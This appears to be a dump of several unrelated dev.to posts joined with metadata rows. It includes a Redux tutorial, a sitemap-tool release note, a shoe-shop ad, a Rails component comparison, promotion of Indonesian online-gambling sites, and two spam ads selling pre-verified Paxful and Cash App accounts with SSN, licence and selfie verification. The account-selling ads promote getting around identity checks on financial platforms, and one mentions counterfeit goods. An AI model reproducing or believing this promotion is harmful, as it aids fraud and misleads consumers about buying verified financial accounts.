landscape.\n\nPaxful has emerged as a favored platform for digital currency trading, catering to a diverse audience. One of Paxful’s key features is its direct peer-to-peer trading system, eliminating the need for intermediaries or cryptocurrency exchanges. By leveraging Paxful’s escrow system, users can trade securely and confidently.\n\nWhat sets Paxful apart is its commitment to identity verification, ensuring a trustworthy environment for buyers and sellers alike. With these user-centric qualities, Paxful has successfully established itself as a leading platform for hassle-free digital currency transactions, appealing to a wide range of individuals seeking a reliable and convenient trading experience. Buy Verified Paxful Account.\n\n \n\nHow paxful ensure risk-free transaction and trading?\nEngage in safe online financial activities by prioritizing verified accounts to reduce the risk of fraud. Platforms like Paxfu implement stringent identity and address verification measures to protect users from scammers and ensure credibility.\n\nWith verified accounts, users can trade with confidence, knowing they are interacting with legitimate individuals or entities. By fostering trust through verified accounts, Paxful strengthens the integrity of its ecosystem, making it a secure space for financial transactions for all users. Buy Verified Paxful Account.\n\nExperience seamless transactions by obtaining a verified Paxful account. Verification signals a user’s dedication to the platform’s guidelines, leading to the prestigious badge of trust. This trust not only expedites trades but also reduces transaction scrutiny. Additionally, verified users unlock exclusive features enhancing efficiency on Paxful. Elevate your trading experience with Verified Paxful Accounts today.\n\nIn the ever-changing realm of online trading and transactions, selecting a platform with minimal fees is paramount for optimizing returns. This choice not only enhances your financial capabilities but also facilitates more frequent trading while safeguarding gains. Buy Verified Paxful Account.\n\nExamining the details of fee configurations reveals Paxful as a frontrunner in cost-effectiveness. Acquire a verified level-3 USA Paxful account from usasmmonline.com for a secure transaction experience. Invest in verified Paxful accounts to take advantage of a leading platform in the online trading landscape.\n\n \n\nHow Old Paxful ensures a lot of Advantages?\n\nExplore the boundless opportunities that Verified Paxful accounts present for businesses looking to venture into the digital currency realm, as companies globally witness heightened profits and expansion. These success stories underline the myriad advantages of Paxful’s user-friendly interface, minimal fees, and robust trading tools, demonstrating its relevance across various sectors.\n\nBusinesses benefit from efficient transaction processing and cost-effective solutions, making Paxful a significant player in facilitating financial operations. Acquire a USA Paxful account effortlessly at a competitive rate from usasmmonline.com and unlock access to a world of possibilities. Buy Verified Paxful Account.\n\nExperience elevated convenience and accessibility through Paxful, where stories of transformation abound. Whether you are an individual seeking seamless transactions or a business eager to tap into a global market, buying old Paxful accounts unveils opportunities for growth.\n\nPaxful’s verified accounts not only offer reliability within the trading community but also serve as a testament to the platform’s ability to empower economic activities worldwide. Join the journey towards expansive possibilities and enhanced financial empowerment with Paxful today. Buy Verified Paxful Account.\n\n \n\nWhy paxful keep the security measures at the top priority?\nIn today’s digital landscape, security stands as a paramount concern for all individuals engaging in online activities, particularly within marketplaces such as Paxful. It is essential for account holders to remain informed about the comprehensive security protocols that are in place to safeguard their information.\n\nSafeguarding your Paxful account is imperative to guaranteeing the safety and security of your transactions. Two essential security components, Two-Factor Authentication and Routine Security Audits, serve as the pillars fortifying this shield of protection, ensuring a secure and trustworthy user experience for all. Buy Verified Paxful Account.\n\nConclusion\nInvesting in Bitcoin offers various avenues, and among those, utilizing a Paxful account has emerged as a favored option. Paxful, an esteemed online marketplace, enables users to engage in buying and selling Bitcoin. Buy Verified Paxful Account.\n\nThe initial step involves creating an account on Paxful and completing the verification process to ensure identity authentication. Subsequently, users gain access to a diverse range of offers from fellow users on the platform. Once a suitable proposal captures your interest, you can proceed to initiate a trade with the respective user, opening the doors to a seamless Bitcoin investing experience.\n\nIn conclusion, when considering the option of purchasing verified Paxful accounts, exercising caution and conducting thorough due diligence is of utmost importance. It is highly recommended to seek reputable sources and diligently research the seller’s history and reviews before making any transactions.\n\nMoreover, it is crucial to familiarize oneself with the terms and conditions outlined by Paxful regarding account verification, bearing in mind the potential consequences of violating those terms. By adhering to these guidelines, individuals can ensure a secure and reliable experience when engaging in such transactions. Buy Verified Paxful Account.\n\n \n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 (980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com" | reideweide55 |
1,881,502 | Redux For Beginners | Basic Overview 📖 Why Redux is needed ?? Ans : In large-scale applications with numerous... | 0 | 2024-06-08T18:58:43 | https://dev.to/jemmyasjd/redux-for-beginners-4l16 | redux, react, tutorial, webdev | ## **Basic Overview 📖**
- **Why Redux is needed ??**
**Ans :** In large-scale applications with numerous interdependent components, maintaining the state for each component can become highly complex and cumbersome. Shifting components within such a system necessitates adjustments not only to their individual states but also to the states of all related components. React-Redux simplifies this process significantly. It effectively addresses the issue of "props drilling," where props must be passed through multiple layers of components, thereby streamlining state management and enhancing maintainability.
**Define Redux:** Redux is a library for managing global application state. Redux is typically used with the React-Redux library for integrating Redux and React together.
## **Redux Architecture: ⚙️**

- **Action Creation:** When a user interacts with the UI and triggers an event, an action is created. An action is a plain JavaScript object that describes what happened and typically contains a type and payload.
- **Event Dispatcher:** This action is dispatched to the Redux Store via the dispatch function. The dispatch function is responsible for sending the action to the Redux Store.
- **Reducers:** The Redux Store then uses reducers to handle the action. Reducers are pure functions that take the current state and the dispatched action as arguments, process the action, and return a new state.
- **Store Update:** The Redux Store updates its state with the new value returned by the reducer. Since reducers are pure functions, they ensure that the state updates are predictable and consistent.
- **State Subscription:** Components that have subscribed to the Redux Store are notified of the state changes. These components can then re-render with the updated state, ensuring the UI is always in sync with the application state.
**How Redux solve the problem ??**
**Ans :** Redux solves state management problems in large-scale React applications by centralizing the state in a single store called the Redux Store. This architecture eliminates the issue of prop drilling, where props must be passed through multiple layers of components. Instead, all state is managed in one place, making it easier to maintain and update. When a user interacts with the UI, an action is dispatched to the Redux Store. Reducers, which are pure functions, then process these actions to update the state. Components subscribed to the store are notified of these changes and re-render accordingly, ensuring the UI stays in sync with the application state. This centralized, predictable state management streamlines complex interactions and enhances maintainability.
-----------------------------
## **Commands and Methods:**
-> **createStore from redux lib** : use to create the redux store.
-> **Provider from react-redux lib** : Act as a provider for the app which use the store as props
-> **reducer** : it is function that act as a reducer which has two parameter : state and action
-> **useDispatch from react-redux lib** : act as a event dispatcher for the actions.
-> **useSelector from react-redux lib**: use to select the value from the redux store.
- However this all methods are just for the basic information about how the redux architecture work in actuall. But in practical we use the **_Redux toolkit_** which makes our work easy and simpler.
- You may find the practical counter example in the given github link in the folder react-basics: [link](https://github.com/jemmyasjd/React_Redux)
- Run the following command to execute the code :
```
git clone https://github.com/jemmyasjd/React_Redux
cd react-basics
npm i
npm run dev
```
-----------------------------------------
## **Redux toolkit Methods:**
-> **configureStore**: use to create the redux store using redux toolkit.
-> **createSlice** : In redux toolkit we make the reducer using the concept of sicer. this method is used to create the slice. Which take name,initital state and reducer as a object parameter. In reducer we make the methods which take state and action as a input to change the state based on the action.
-> **createSelector** : use to create the selector for easy convinence
-> **useDispatch** : in redux toolkit we dont need to mention explicitely we just directly pass action from the slice as a parameter.
-> **useSelector from react-redux lib**: use to select the value from the redux store.
-> **action.payload** : it contains change what we had done through dispatcher.
-------------------------------------
## **Practical Add to Cart Example:**
- Firstly we create a store using **_configureStore_** method, in that we pass the reducer which is also consider as a slicer

- We Create the cart reducer using **_createSlice_** method

- Then we dispatch the event using **_useDispatch_** method

- Finally we get the data from the store using **_useSelector_**

- **OUTPUT**

- Get the source code : [click here](https://github.com/jemmyasjd/React_Redux)
- Run the following command to execute the code :
```
git clone https://github.com/jemmyasjd/React_Redux
cd React Toolkit Code
npm i
npm start
```
------------------
## **Api calling methods:**
-> **createasyncThunk** : used to create the action of fetching the data which take ("name", callback function) which trigger when action dispatch.
-> Addtionally we have
extraReducers: (builder) => {
builder.addCase(fetchTodos.pending, (state, action) => {
state.isLoading = true;
});
builder.addCase(fetchTodos.fulfilled, (state, action) => {
state.isLoading = false;
state.data = action.payload;
});
builder.addCase(fetchTodos.rejected, (state, action) => {
console.log("Error", action.payload);
state.isError = true;
});
-------------------------------
## **Practical todo fetching example:**
- fetch the todos using **_createThunk_** method

- Get code [here](https://github.com/jemmyasjd/React_Redux)
----------------------------------
## Conclusion
This blog explored how Redux simplifies state management in large-scale React applications by centralizing state in the Redux Store, eliminating prop drilling, and promoting consistency. The architecture of actions, dispatchers, reducers, and subscriptions enhances maintainability. The Redux Toolkit further streamlines workflows by reducing boilerplate. Practical examples, like "Add to Cart" and API handling with `createAsyncThunk`, showcase Redux's capabilities. These tools enable developers to build scalable and maintainable React applications, making Redux essential in modern web development. For a deeper understanding, the provided GitHub repository offers practical implementations.
| jemmyasjd |
1,881,501 | Willkommen bei Donelli: Entdecken Sie Luxus-Schuhe für die ganze Familie! | Donelli bietet eine sorgfältig kuratierte Auswahl exklusiver Luxus-Schuhe für Damen, Herren und... | 0 | 2024-06-08T18:57:45 | https://dev.to/donelli/willkommen-bei-donelli-entdecken-sie-luxus-schuhe-fur-die-ganze-familie-100c | career, news, design | [Donelli](https://donelli.com/) bietet eine sorgfältig kuratierte Auswahl exklusiver Luxus-Schuhe für Damen, Herren und Kinder. Von eleganten Pumps über zeitlose Stiefel bis hin zu lässigen Sneakern bieten wir für jeden Geschmack und Anlass das Passende. Unsere Kollektion umfasst führende Marken wie ViaVai, Paul Green und Gabor, die für erstklassige Qualität und herausragenden Komfort bekannt sind. Besuchen Sie uns online auf [Donelli.com](https://donelli.com/) oder in unserem Geschäft in Bilthoven und erleben Sie den Luxus, den wir Ihnen bieten können.
| donelli |
1,881,498 | generate-sitemap 1.10.1 Released | TL;DR I just released generate-sitemap 1.10.1, a GitHub Action for generating XML sitemaps... | 21,457 | 2024-06-08T18:52:44 | https://dev.to/cicirello/generate-sitemap-1101-released-3f73 | github, webdev, showdev, python | ## TL;DR
I just released [generate-sitemap](https://github.com/cicirello/generate-sitemap) 1.10.1, a [GitHub Action for generating XML sitemaps for static websites](https://dev.to/cicirello/generate-an-xml-sitemap-for-a-static-website-in-github-actions-20do). The generate-sitemap GitHub Action is implemented in Python, and generates an XML sitemap by crawling the GitHub repository containing the html of the site, using commit dates to generate `<lastmod>` tags in the sitemap.
## Changelog 1.10.1 - 2024-06-08
### Fixed
* Escape characters that must be escaped in XML.
### Dependencies
* Bump [cicirello/pyaction](https://github.com/cicirello/pyaction) from 4.26.0 to 4.30.0
## More Information
Please consider starring generate-sitemap's GitHub repository:
{% github cicirello/generate-sitemap %}
For more information, see my earlier post about generate-sitemap here on DEV, as well as its webpage.
{% link https://dev.to/cicirello/generate-an-xml-sitemap-for-a-static-website-in-github-actions-20do %}
{% embed https://actions.cicirello.org/generate-sitemap/ %}
## Where You Can Find Me
Follow me [here on DEV](https://dev.to/cicirello) and on [GitHub](https://github.com/cicirello):
{% user cicirello %}
| cicirello |
1,881,495 | Perjalanan Menuju Profesionalisme: Tips Bermain Judi Online Seperti Ahli | Perjalanan Menuju Profesionalisme: Tips Bermain Judi Online Seperti Ahli Dalam era... | 0 | 2024-06-08T18:49:38 | https://dev.to/millierobles/perjalanan-menuju-profesionalisme-tips-bermain-judi-online-seperti-ahli-2fc6 | webdev, javascript, programming, beginners | Perjalanan Menuju Profesionalisme: Tips Bermain Judi Online Seperti Ahli
========================================================================

Dalam era digital yang terus berkembang, industri judi online telah menjadi salah satu sektor yang mengalami pertumbuhan yang pesat. Pemilik bisnis judi online dan pemain profesional kini menghadapi persaingan yang semakin ketat. Untuk berhasil dalam industri ini, penting bagi mereka untuk memiliki pengetahuan mendalam, keterampilan yang kuat, dan strategi yang efektif. Artikel ini akan memberikan wawasan mendalam, statistik terbaru, dan contoh nyata tentang permainan judi online, serta memberikan tips kepada pemilik bisnis dan pemain profesional tentang bagaimana bermain seperti ahli.
Tren Terkini dalam Permainan Judi Online
----------------------------------------
Seiring dengan perkembangan teknologi, permainan judi **[dewapoker online](https://neon.ly/vgRW6)** telah mengalami transformasi yang signifikan. Menurut statistik terbaru, jumlah pemain judi online di seluruh dunia telah mencapai angka yang mengesankan. Pada tahun 2021, diperkirakan ada lebih dari 2,5 miliar pemain judi online di seluruh dunia. Ini menunjukkan betapa pentingnya industri ini dan potensi keuntungan yang dapat diperoleh.
Namun, untuk menjadi ahli dalam permainan judi online, pemilik bisnis dan pemain profesional harus memahami tren terkini dalam industri ini. Salah satu tren yang sedang berkembang pesat adalah penggunaan perangkat mobile. Data menunjukkan bahwa lebih dari 80% pemain judi online mengakses platform melalui perangkat mobile mereka. Oleh karena itu, penting bagi pemilik bisnis untuk mengoptimalkan pengalaman pengguna untuk perangkat mobile guna menjangkau lebih banyak pemain potensial dan meningkatkan retensi pemain yang ada.
Selain itu, e-Sports betting juga merupakan tren yang patut diperhatikan. E-Sports, atau kompetisi permainan video profesional, telah menjadi fenomena global dengan basis penggemar yang besar dan terus berkembang. Menurut laporan terbaru, pendapatan dari e-Sports betting diprediksi mencapai lebih dari 23 miliar dolar AS pada tahun 2024. Pemilik bisnis judi online yang mampu menyediakan opsi taruhan e-Sports dapat menarik pemain yang tertarik pada kompetisi permainan video dan meningkatkan pendapatan mereka.
Terakhir, pengalaman pengguna yang **[login poker88](https://neon.ly/mw4kD)** ditingkatkan juga menjadi faktor kunci. Pemain sekarang mengharapkan pengalaman bermain yang lebih menarik, interaktif, dan imersif. Penggunaan teknologi seperti virtual reality (VR) atau augmented reality (AR) dalam permainan judi online dapat memberikan pengalaman yang lebih mendalam dan menghibur. Pemilik bisnis judi online yang mengadopsi teknologi ini dapat menciptakan diferensiasi dari pesaing dan menarik pemain yang mencari pengalaman bermain yang inovatif.
Strategi untuk Bermain Seperti Ahli
-----------------------------------
Untuk mencapai profesionalisme dalam permainan judi online, pemilik bisnis dan pemain profesional harus melibatkan diri secara aktif dalam peningkatan keterampilan mereka. Berikut adalah beberapa tips yang dapat membantu mereka mencapai tujuan tersebut:
1. Pendidikan dan Penelitian: Edukasi adalah kunci keberhasilan dalam industri judi online. Pemilik bisnis dan pemain profesional harus mengikuti publikasi industri, menghadiri konferensi, dan menjalin hubungan dengan ahli dan profesional lainnya. Dengan cara ini, mereka dapat memperoleh wawasan berharga tentang perubahan pasar, tren terbaru, dan strategi sukses.
2. Manajemen Risiko yang Cermat: Profesionalisme dalam permainan judi online melibatkan manajemen risiko yang cermat. Pemain harus mengatur batas keuangan yang jelas, mengendalikan emosi, dan membuat keputusan berdasarkan analisis yang rasional. Penting juga untuk memahami peluang dan mempertimbangkan risiko sebelum membuat taruhan.
3. Penggunaan Teknologi yang Canggih: Pemilik bisnis judi **[dominobet asia](https://neon.ly/vkB8j)** online harus mengadopsi teknologi terbaru untuk meningkatkan pengalaman pengguna. Penggunaan teknologi VR, AR, atau kecerdasanbuatan (AI) dapat memberikan pengalaman bermain yang inovatif dan menarik. Contohnya, penggunaan teknologi AI dalam sistem pengenalan pola permainan dapat membantu pemilik bisnis mengidentifikasi pola permainan yang mencurigakan atau perilaku pemain yang tidak wajar guna mencegah penipuan.
4. Analisis Data yang Mendalam: Pemilik bisnis dan pemain profesional harus mengandalkan analisis data yang mendalam untuk mengidentifikasi tren, pola permainan, dan preferensi pemain. Dengan memahami data ini, mereka dapat mengambil keputusan yang lebih informasional dan strategis dalam permainan judi online.
**Contoh Nyata: Kasus Poker Online**
Sebagai contoh nyata tentang permainan judi online, mari kita lihat industri poker online. Statistik menunjukkan bahwa pada tahun 2020, industri poker online mengalami pertumbuhan yang signifikan dengan nilai pasar sebesar 7,2 miliar dolar AS. Salah satu faktor yang berkontribusi pada pertumbuhan ini adalah kemajuan teknologi yang memungkinkan pemain untuk bermain poker online dengan pengalaman yang mirip dengan bermain di kasino fisik.
Poker online telah mengalami evolusi yang menarik, termasuk pengembangan platform dengan grafik yang realistis, fitur interaktif, dan dukungan untuk perangkat mobile. Selain itu, perangkat lunak AI yang canggih digunakan untuk menganalisis pola permainan dan memprediksi strategi lawan. Hal ini memberikan keuntungan bagi pemain yang dapat menggunakan informasi tersebut untuk membuat keputusan yang lebih baik dalam permainan.
Sebagai pemain poker online yang profesional, penting untuk mempelajari strategi permainan yang efektif, mengamati pola permainan lawan, dan memanfaatkan keunggulan teknologi yang tersedia. Dengan menggabungkan pengetahuan tentang tren terkini, manajemen risiko yang cermat, dan analisis data yang mendalam, pemain dapat meningkatkan peluang mereka untuk meraih keuntungan dalam permainan poker online.
### Kesimpulan Tips Bermain Judi Online Seperti Ahli
Perjalanan menuju profesionalisme dalam permainan judi online membutuhkan pengetahuan mendalam, keterampilan yang kuat, dan strategi yang efektif. Dengan **[daftar domino88](https://neon.ly/N4Z7z)** dan memperhatikan tren terkini dalam industri ini, seperti penggunaan perangkat mobile, e-Sports betting, dan pengalaman pengguna yang ditingkatkan, pemilik bisnis dan pemain profesional dapat mengambil langkah-langkah yang tepat untuk meningkatkan keuntungan mereka.
Melalui pendidikan, penelitian, manajemen risiko yang cermat, penggunaan teknologi yang canggih, dan analisis data yang mendalam, pemilik bisnis dan pemain profesional dapat bermain seperti ahli dalam permainan judi online. Contoh nyata seperti industri poker online memberikan gambaran tentang bagaimana evolusi teknologi telah mempengaruhi permainan dan memberikan peluang bagi mereka yang dapat memanfaatkannya dengan baik.
Dalam dunia yang terus berkembang ini, pemilik bisnis judi online dan pemain profesional harus terus beradaptasi dengan tren terbaru, meningkatkan keterampilan, dan mengikuti perkembangan teknologi. Dengan demikian, mereka dapat membuka pintu menuju profesionalisme dalam industri judi online dan meraih kesuksesan yang lebih besar. | millierobles |
1,881,494 | Buy verified cash app account | https://dmhelpshop.com/product/buy-verified-cash-app-account/ Buy verified cash app account Cash... | 0 | 2024-06-08T18:49:15 | https://dev.to/reideweide55/buy-verified-cash-app-account-2p86 | webdev, javascript, beginners, programming | ERROR: type should be string, got "https://dmhelpshop.com/product/buy-verified-cash-app-account/\n\n\n\n\nBuy verified cash app account\nCash app has emerged as a dominant force in the realm of mobile banking within the USA, offering unparalleled convenience for digital money transfers, deposits, and trading. As the foremost provider of fully verified cash app accounts, we take pride in our ability to deliver accounts with substantial limits. Bitcoin enablement, and an unmatched level of security.\n\nOur commitment to facilitating seamless transactions and enabling digital currency trades has garnered significant acclaim, as evidenced by the overwhelming response from our satisfied clientele. Those seeking buy verified cash app account with 100% legitimate documentation and unrestricted access need look no further. Get in touch with us promptly to acquire your verified cash app account and take advantage of all the benefits it has to offer.\n\nWhy dmhelpshop is the best place to buy USA cash app accounts?\nIt’s crucial to stay informed about any updates to the platform you’re using. If an update has been released, it’s important to explore alternative options. Contact the platform’s support team to inquire about the status of the cash app service.\n\nClearly communicate your requirements and inquire whether they can meet your needs and provide the buy verified cash app account promptly. If they assure you that they can fulfill your requirements within the specified timeframe, proceed with the verification process using the required documents.\n\nOur account verification process includes the submission of the following documents: [List of specific documents required for verification].\n\nGenuine and activated email verified\nRegistered phone number (USA)\nSelfie verified\nSSN (social security number) verified\nDriving license\nBTC enable or not enable (BTC enable best)\n100% replacement guaranteed\n100% customer satisfaction\nWhen it comes to staying on top of the latest platform updates, it’s crucial to act fast and ensure you’re positioned in the best possible place. If you’re considering a switch, reaching out to the right contacts and inquiring about the status of the buy verified cash app account service update is essential.\n\nClearly communicate your requirements and gauge their commitment to fulfilling them promptly. Once you’ve confirmed their capability, proceed with the verification process using genuine and activated email verification, a registered USA phone number, selfie verification, social security number (SSN) verification, and a valid driving license.\n\nAdditionally, assessing whether BTC enablement is available is advisable, buy verified cash app account, with a preference for this feature. It’s important to note that a 100% replacement guarantee and ensuring 100% customer satisfaction are essential benchmarks in this process.\n\nHow to use the Cash Card to make purchases?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card. Alternatively, you can manually enter the CVV and expiration date. How To Buy Verified Cash App Accounts.\n\nAfter submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a buy verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account.\n\nWhy we suggest to unchanged the Cash App account username?\nTo activate your Cash Card, open the Cash App on your compatible device, locate the Cash Card icon at the bottom of the screen, and tap on it. Then select “Activate Cash Card” and proceed to scan the QR code on your card.\n\nAlternatively, you can manually enter the CVV and expiration date. After submitting your information, including your registered number, expiration date, and CVV code, you can start making payments by conveniently tapping your card on a contactless-enabled payment terminal. Consider obtaining a verified Cash App account for seamless transactions, especially for business purposes. Buy verified cash app account. Purchase Verified Cash App Accounts.\n\nSelecting a username in an app usually comes with the understanding that it cannot be easily changed within the app’s settings or options. This deliberate control is in place to uphold consistency and minimize potential user confusion, especially for those who have added you as a contact using your username. In addition, purchasing a Cash App account with verified genuine documents already linked to the account ensures a reliable and secure transaction experience.\n\n \n\nBuy verified cash app accounts quickly and easily for all your financial needs.\nAs the user base of our platform continues to grow, the significance of verified accounts cannot be overstated for both businesses and individuals seeking to leverage its full range of features. How To Buy Verified Cash App Accounts.\n\nFor entrepreneurs, freelancers, and investors alike, a verified cash app account opens the door to sending, receiving, and withdrawing substantial amounts of money, offering unparalleled convenience and flexibility. Whether you’re conducting business or managing personal finances, the benefits of a verified account are clear, providing a secure and efficient means to transact and manage funds at scale.\n\nWhen it comes to the rising trend of purchasing buy verified cash app account, it’s crucial to tread carefully and opt for reputable providers to steer clear of potential scams and fraudulent activities. How To Buy Verified Cash App Accounts. With numerous providers offering this service at competitive prices, it is paramount to be diligent in selecting a trusted source.\n\nThis article serves as a comprehensive guide, equipping you with the essential knowledge to navigate the process of procuring buy verified cash app account, ensuring that you are well-informed before making any purchasing decisions. Understanding the fundamentals is key, and by following this guide, you’ll be empowered to make informed choices with confidence.\n\n \n\nIs it safe to buy Cash App Verified Accounts?\nCash App, being a prominent peer-to-peer mobile payment application, is widely utilized by numerous individuals for their transactions. However, concerns regarding its safety have arisen, particularly pertaining to the purchase of “verified” accounts through Cash App. This raises questions about the security of Cash App’s verification process.\n\nUnfortunately, the answer is negative, as buying such verified accounts entails risks and is deemed unsafe. Therefore, it is crucial for everyone to exercise caution and be aware of potential vulnerabilities when using Cash App. How To Buy Verified Cash App Accounts.\n\nCash App has emerged as a widely embraced platform for purchasing Instagram Followers using PayPal, catering to a diverse range of users. This convenient application permits individuals possessing a PayPal account to procure authenticated Instagram Followers.\n\nLeveraging the Cash App, users can either opt to procure followers for a predetermined quantity or exercise patience until their account accrues a substantial follower count, subsequently making a bulk purchase. Although the Cash App provides this service, it is crucial to discern between genuine and counterfeit items. If you find yourself in search of counterfeit products such as a Rolex, a Louis Vuitton item, or a Louis Vuitton bag, there are two viable approaches to consider.\n\n \n\nWhy you need to buy verified Cash App accounts personal or business?\nThe Cash App is a versatile digital wallet enabling seamless money transfers among its users. However, it presents a concern as it facilitates transfer to both verified and unverified individuals.\n\nTo address this, the Cash App offers the option to become a verified user, which unlocks a range of advantages. Verified users can enjoy perks such as express payment, immediate issue resolution, and a generous interest-free period of up to two weeks. With its user-friendly interface and enhanced capabilities, the Cash App caters to the needs of a wide audience, ensuring convenient and secure digital transactions for all.\n\nIf you’re a business person seeking additional funds to expand your business, we have a solution for you. Payroll management can often be a challenging task, regardless of whether you’re a small family-run business or a large corporation. How To Buy Verified Cash App Accounts.\n\nImproper payment practices can lead to potential issues with your employees, as they could report you to the government. However, worry not, as we offer a reliable and efficient way to ensure proper payroll management, avoiding any potential complications. Our services provide you with the funds you need without compromising your reputation or legal standing. With our assistance, you can focus on growing your business while maintaining a professional and compliant relationship with your employees. Purchase Verified Cash App Accounts.\n\nA Cash App has emerged as a leading peer-to-peer payment method, catering to a wide range of users. With its seamless functionality, individuals can effortlessly send and receive cash in a matter of seconds, bypassing the need for a traditional bank account or social security number. Buy verified cash app account.\n\nThis accessibility makes it particularly appealing to millennials, addressing a common challenge they face in accessing physical currency. As a result, ACash App has established itself as a preferred choice among diverse audiences, enabling swift and hassle-free transactions for everyone. Purchase Verified Cash App Accounts.\n\n \n\nHow to verify Cash App accounts\nTo ensure the verification of your Cash App account, it is essential to securely store all your required documents in your account. This process includes accurately supplying your date of birth and verifying the US or UK phone number linked to your Cash App account.\n\nAs part of the verification process, you will be asked to submit accurate personal details such as your date of birth, the last four digits of your SSN, and your email address. If additional information is requested by the Cash App community to validate your account, be prepared to provide it promptly. Upon successful verification, you will gain full access to managing your account balance, as well as sending and receiving funds seamlessly. Buy verified cash app account.\n\n \n\nHow cash used for international transaction?\nExperience the seamless convenience of this innovative platform that simplifies money transfers to the level of sending a text message. It effortlessly connects users within the familiar confines of their respective currency regions, primarily in the United States and the United Kingdom.\n\nNo matter if you’re a freelancer seeking to diversify your clientele or a small business eager to enhance market presence, this solution caters to your financial needs efficiently and securely. Embrace a world of unlimited possibilities while staying connected to your currency domain. Buy verified cash app account.\n\nUnderstanding the currency capabilities of your selected payment application is essential in today’s digital landscape, where versatile financial tools are increasingly sought after. In this era of rapid technological advancements, being well-informed about platforms such as Cash App is crucial.\n\nAs we progress into the digital age, the significance of keeping abreast of such services becomes more pronounced, emphasizing the necessity of staying updated with the evolving financial trends and options available. Buy verified cash app account.\n\nOffers and advantage to buy cash app accounts cheap?\nWith Cash App, the possibilities are endless, offering numerous advantages in online marketing, cryptocurrency trading, and mobile banking while ensuring high security. As a top creator of Cash App accounts, our team possesses unparalleled expertise in navigating the platform.\n\nWe deliver accounts with maximum security and unwavering loyalty at competitive prices unmatched by other agencies. Rest assured, you can trust our services without hesitation, as we prioritize your peace of mind and satisfaction above all else.\n\nEnhance your business operations effortlessly by utilizing the Cash App e-wallet for seamless payment processing, money transfers, and various other essential tasks. Amidst a myriad of transaction platforms in existence today, the Cash App e-wallet stands out as a premier choice, offering users a multitude of functions to streamline their financial activities effectively. Buy verified cash app account.\n\nTrustbizs.com stands by the Cash App’s superiority and recommends acquiring your Cash App accounts from this trusted source to optimize your business potential.\n\nHow Customizable are the Payment Options on Cash App for Businesses?\nDiscover the flexible payment options available to businesses on Cash App, enabling a range of customization features to streamline transactions. Business users have the ability to adjust transaction amounts, incorporate tipping options, and leverage robust reporting tools for enhanced financial management.\n\nExplore trustbizs.com to acquire verified Cash App accounts with LD backup at a competitive price, ensuring a secure and efficient payment solution for your business needs. Buy verified cash app account.\n\nDiscover Cash App, an innovative platform ideal for small business owners and entrepreneurs aiming to simplify their financial operations. With its intuitive interface, Cash App empowers businesses to seamlessly receive payments and effectively oversee their finances. Emphasizing customization, this app accommodates a variety of business requirements and preferences, making it a versatile tool for all.\n\nWhere To Buy Verified Cash App Accounts\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nThe Importance Of Verified Cash App Accounts\nIn today’s digital age, the significance of verified Cash App accounts cannot be overstated, as they serve as a cornerstone for secure and trustworthy online transactions.\n\nBy acquiring verified Cash App accounts, users not only establish credibility but also instill the confidence required to participate in financial endeavors with peace of mind, thus solidifying its status as an indispensable asset for individuals navigating the digital marketplace.\n\nWhen considering purchasing a verified Cash App account, it is imperative to carefully scrutinize the seller’s pricing and payment methods. Look for pricing that aligns with the market value, ensuring transparency and legitimacy. Buy verified cash app account.\n\nEqually important is the need to opt for sellers who provide secure payment channels to safeguard your financial data. Trust your intuition; skepticism towards deals that appear overly advantageous or sellers who raise red flags is warranted. It is always wise to prioritize caution and explore alternative avenues if uncertainties arise.\n\nConclusion\nEnhance your online financial transactions with verified Cash App accounts, a secure and convenient option for all individuals. By purchasing these accounts, you can access exclusive features, benefit from higher transaction limits, and enjoy enhanced protection against fraudulent activities. Streamline your financial interactions and experience peace of mind knowing your transactions are secure and efficient with verified Cash App accounts.\n\nChoose a trusted provider when acquiring accounts to guarantee legitimacy and reliability. In an era where Cash App is increasingly favored for financial transactions, possessing a verified account offers users peace of mind and ease in managing their finances. Make informed decisions to safeguard your financial assets and streamline your personal transactions effectively.\n\nContact Us / 24 Hours Reply\nTelegram:dmhelpshop\nWhatsApp: +1 (980) 277-2786\nSkype:dmhelpshop\nEmail:dmhelpshop@gmail.com\n\n" | reideweide55 |
1,875,729 | Developing Modern Web Applications with Rails: Choosing the Right Component Tool | Developing modern web applications requires using reusable, testable, and maintainable components. In... | 0 | 2024-06-08T18:24:40 | https://dev.to/fbzsaullo/developing-modern-web-applications-with-rails-choosing-the-right-component-tool-253p | rails, ruby, webdev, learning |
Developing modern web applications requires using reusable, testable, and maintainable components. In the Rails ecosystem, there are several popular alternatives for creating components. Let's explore some of these tools: ViewComponent, Phlex, React + Rails, Rux, and Cells. Each of them has its pros and cons, which we will discuss below with practical examples.
---
## [ViewComponent](https://github.com/ViewComponent/view_component)
### ✅ Pros:
- **Reusability**: Facilitates the creation of reusable and encapsulated components, improving code maintenance and cohesion.
- **Testability**: Allows more effective unit tests, increasing test coverage and code reliability.
- **Performance**: Components are ~10x faster than traditional partials, thanks to precompiled templates.
- **Structure**: Encourages code organization, following patterns similar to Rails controllers and models.
### ❌ Cons:
- **Learning Curve**: It can be more challenging for beginners who are not familiar with component concepts.
- **Initial Complexity**: Requires initial setup and might seem excessive for very small projects.
### 🔍 Example
```sh
# Create the Button component
rails generate component Button title path
```
```ruby
# app/components/button_component.rb
class ButtonComponent < ViewComponent::Base
def initialize(title:, path:)
@title = title
@path = path
end
end
```
```erb
# app/components/button_component.html.erb
<a href="<%= @path %>" class="btn">
<%= @title %>
</a>
```
```erb
# In the template to render the component
<%= render(ButtonComponent.new(title: "Click Me", path: profile_path)) %>
```
---
## [Phlex](https://github.com/joeldrapper/phlex)
### ✅ Pros:
- **Ruby Syntax**: Uses an object-oriented approach that can be more intuitive for Ruby developers.
- **Performance**: Efficient in rendering components.
### ❌ Cons:
- **Smaller Community**: Less documentation and support compared to more mature tools.
- **Integration**: May require significant adjustments to integrate well with existing projects.
